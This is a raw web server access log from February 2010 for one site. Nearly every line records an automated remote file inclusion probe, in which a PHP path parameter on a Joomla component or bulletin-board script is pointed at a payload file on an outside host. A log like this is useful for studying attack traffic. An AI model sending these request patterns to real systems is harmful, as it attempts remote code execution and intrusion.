87.106.250.198 - - [20/Feb/2010:05:50:54 -0800] "GET /bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:50:54 -0800] "GET /logs//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:50:54 -0800] "GET /logs/access.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:51:04 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:51:26 -0800] "GET /logs/access_100119.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:05:51:33 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:05:51:36 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:05:51:36 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:52:05 -0800] "GET /logs/access.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:52:05 -0800] "GET /bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:52:06 -0800] "GET /logs//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:05:52:19 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:05:52:19 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:05:52:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:52:20 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:52:20 -0800] "GET /appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:52:20 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:52:29 -0800] "GET /logs/access_100206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:52:48 -0800] "GET /logs/access_100120.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:05:52:48 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:52:52 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:52:53 -0800] "GET /logs/access_100119.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:52:55 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:52:55 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:52:55 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:52:56 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:53:01 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:53:16 -0800] "GET /appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:53:16 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:53:16 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:53:40 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:53:40 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:53:40 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:05:53:44 -0800] "GET /logs/access_100120.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:54:19 -0800] "GET /delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:54:19 -0800] "GET /logs/access_100122.log%20%20//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:54:19 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:05:54:19 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:54:38 -0800] "GET /bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:54:48 -0800] "GET /logs/access_100128.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:54:48 -0800] "GET /logs//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:05:55:23 -0800] "GET /logs/access_100211.log//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:56:23 -0800] "GET /logs/access_100201.log%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:56:23 -0800] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:05:56:24 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:56:45 -0800] "GET /logs/access_100129.log//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:05:57:04 -0800] "GET /logs/access_100121.log//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:57:20 -0800] "GET /logs/access_100114.log%20%20//index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:57:20 -0800] "GET /logs//index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:57:20 -0800] "GET /index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:57:23 -0800] "GET /logs/access_100114.log%20%20//index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:57:23 -0800] "GET /logs//index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:57:23 -0800] "GET /index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [20/Feb/2010:05:57:39 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [20/Feb/2010:05:57:40 -0800] "GET /logs/access_100201.log%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [20/Feb/2010:05:57:40 -0800] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:57:47 -0800] "GET /logs/access_100119.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:05:58:32 -0800] "GET /logs/access_100118.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:58:46 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:58:46 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:58:47 -0800] "GET /logs/access_100130.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:58:49 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:58:50 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:05:58:50 -0800] "GET /logs/access_100130.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:58:52 -0800] "GET /bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:58:52 -0800] "GET /logs//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:05:58:52 -0800] "GET /logs/access.log%20%20//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:59:16 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:59:16 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:05:59:16 -0800] "GET /logs/access_100123.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:05:59:29 -0800] "GET /logs/access_100125.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:05:59:29 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:05:59:29 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:59:37 -0800] "GET /logs/access_100119.log%20%20//index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [20/Feb/2010:05:59:40 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:05:59:41 -0800] "GET /logs/access_100119.log%20%20//index.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [20/Feb/2010:05:59:41 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:05:59:55 -0800] "GET /logs/access_100206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:05:59:57 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:05:59:57 -0800] "GET /logs/access_100123.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:05:59:57 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:00:08 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [20/Feb/2010:06:00:08 -0800] "GET /logs/access_100126.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:00:08 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:00:08 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:00:09 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:00:09 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:00:09 -0800] "GET /logs/access_100123.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:00:57 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:00:57 -0800] "GET /logs/access_100201.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:00:57 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:06:00:58 -0800] "GET /logs/access_100129.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:01:02 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:01:02 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:01:02 -0800] "GET /logs/access_100201.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:08 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:08 -0800] "GET /logs/access_100201.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:08 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:01:11 -0800] "GET /logs/access_100125.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:06:01:12 -0800] "GET /logs/access_100118.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:01:16 -0800] "GET /logs/access_100201.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:01:16 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:01:16 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:23 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:28 -0800] "GET /logs/access_100201.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:28 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:32 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:32 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:01:32 -0800] "GET /logs/access_100201.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:01:42 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
